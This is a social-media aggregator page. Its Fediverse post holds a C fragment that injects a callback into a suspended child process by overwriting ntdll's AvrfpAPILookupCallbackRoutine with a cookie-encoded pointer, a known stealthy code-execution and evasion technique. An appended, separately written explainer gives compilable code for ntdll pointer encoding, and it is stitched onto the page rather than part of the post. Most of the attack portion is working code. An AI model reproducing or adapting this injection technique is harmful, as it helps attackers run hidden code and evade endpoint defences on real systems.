home.social

#codeisn — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #codeisn, aggregated by home.social.

  1. // Start a second copy of our own process in a suspended state so we can set up our callback
    // before any of its code runs. This block is a fragment: si, pi, file_path, g_ptr_table,
    // avrfp_address, encode_system_ptr() and LdrGetProcedureAddressCallback() are defined elsewhere.
    if (!CreateProcessA(NULL, file_path, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
    printf("CreateProcessA() failed, error: %lu\n", GetLastError());
    }

    // Overwrite g_ptr_table in the child with our already initialized copy. Using &g_ptr_table as the
    // remote address works because ASLR picks an image base once per boot, so a second instance of
    // the same executable is mapped at the same base as this one.
    if (!WriteProcessMemory(pi.hProcess, &g_ptr_table, &g_ptr_table, sizeof(PTR_TABLE), NULL)) {
    printf("Write 1 failed, error: %lu\n", GetLastError());
    }

    // ntdll stores these pointers encoded with the system pointer cookie at SharedUserData!Cookie,
    // so the callback address has to be encoded the same way before it is written.
    LPVOID callback_ptr = encode_system_ptr(&LdrGetProcedureAddressCallback);

    // Set ntdll!AvrfpAPILookupCallbackRoutine (8 bytes past avrfp_address) to our encoded callback address.
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)(avrfp_address + 8), &callback_ptr, sizeof(ULONG_PTR), NULL)) {
    printf("Write 2 failed, error: %lu\n", GetLastError());
    }

    // Set ntdll!AvrfpAPILookupCallbacksEnabled (a single byte at avrfp_address) to TRUE.
    uint8_t bool_true = 1;

    if (!WriteProcessMemory(pi.hProcess, (LPVOID)avrfp_address, &bool_true, 1, NULL)) {
    printf("Write 3 failed, error: %lu\n", GetLastError());
    }

    // Resume the child's main thread; the callback fires on its API lookups from here on.
    ResumeThread(pi.hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    DLL proxying and side loading is a fun time :D

    #security #cpp #codeisn'tmine #DLL #peb
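The post's encode_system_ptr() is not shown, so here is an added example of the encoding step it relies on. This is not code from the post or its author: it assumes the XOR-then-rotate scheme used by ntdll's RtlEncode*Pointer family (XOR with the 32-bit cookie, then rotate right by cookie & 0x3F) and the x64 layout in which the system pointer cookie sits at offset 0x330 of KUSER_SHARED_DATA (0x7FFE0000). The cookie value used in main() is constructed so the example also runs off Windows; the real cookie is only read under _WIN32.

```c
#include <stdint.h>
#include <stdio.h>
#include <inttypes.h>

/* KUSER_SHARED_DATA is mapped read-only into every process at 0x7FFE0000;
 * the pointer cookie lives at offset 0x330 (assumption: x64 layout). */
#define KUSER_SHARED_DATA_COOKIE ((const volatile uint32_t *)(uintptr_t)0x7FFE0330)

static uint64_t rotr64(uint64_t v, unsigned n)
{
    n &= 63;
    return n ? (v >> n) | (v << (64 - n)) : v;
}

static uint64_t rotl64(uint64_t v, unsigned n)
{
    n &= 63;
    return n ? (v << n) | (v >> (64 - n)) : v;
}

/* Assumed scheme of ntdll's RtlEncode*Pointer family: XOR with the
 * zero-extended 32-bit cookie, then rotate right by cookie & 0x3F.
 * Note the XOR only masks the low 32 bits of the pointer; the high half
 * is hidden by the rotation alone. */
uint64_t encode_ptr_with_cookie(uint64_t ptr, uint32_t cookie)
{
    return rotr64(ptr ^ (uint64_t)cookie, cookie & 0x3F);
}

/* Inverse: rotate left by the same amount, then XOR the cookie back out. */
uint64_t decode_ptr_with_cookie(uint64_t enc, uint32_t cookie)
{
    return rotl64(enc, cookie & 0x3F) ^ (uint64_t)cookie;
}

#ifdef _WIN32
/* Live variant: read the cookie the running system actually uses. */
uint32_t read_system_pointer_cookie(void)
{
    return *KUSER_SHARED_DATA_COOKIE;
}

void *encode_system_ptr(void *p)
{
    return (void *)(uintptr_t)encode_ptr_with_cookie((uint64_t)(uintptr_t)p,
                                                     read_system_pointer_cookie());
}
#endif

/* Sanity check: encoding changes the value and decoding restores it. */
int encode_roundtrips(uint64_t ptr, uint32_t cookie)
{
    uint64_t enc = encode_ptr_with_cookie(ptr, cookie);
    return enc != ptr && decode_ptr_with_cookie(enc, cookie) == ptr;
}

int main(void)
{
    /* Constructed values for an offline run; not real addresses or cookies. */
    uint64_t callback = 0x00007FF812345678ULL;
    uint32_t cookie = 0x1A2B3C4Du;
#ifdef _WIN32
    cookie = read_system_pointer_cookie();
#endif
    uint64_t enc = encode_ptr_with_cookie(callback, cookie);
    printf("cookie   : 0x%08" PRIx32 " (rotate by %u)\n", cookie, cookie & 0x3F);
    printf("plain    : 0x%016" PRIx64 "\n", callback);
    printf("encoded  : 0x%016" PRIx64 "\n", enc);
    printf("decoded  : 0x%016" PRIx64 "\n", decode_ptr_with_cookie(enc, cookie));
    printf("roundtrip: %s\n", encode_roundtrips(callback, cookie) ? "ok" : "FAILED");
    return 0;
}
```

The practical caveat this makes visible: the cookie is shared by every process on the box and readable from user mode, which is why a writer in the parent can produce a value the child's ntdll will happily decode. It also means the encoding is a consistency check, not a secret.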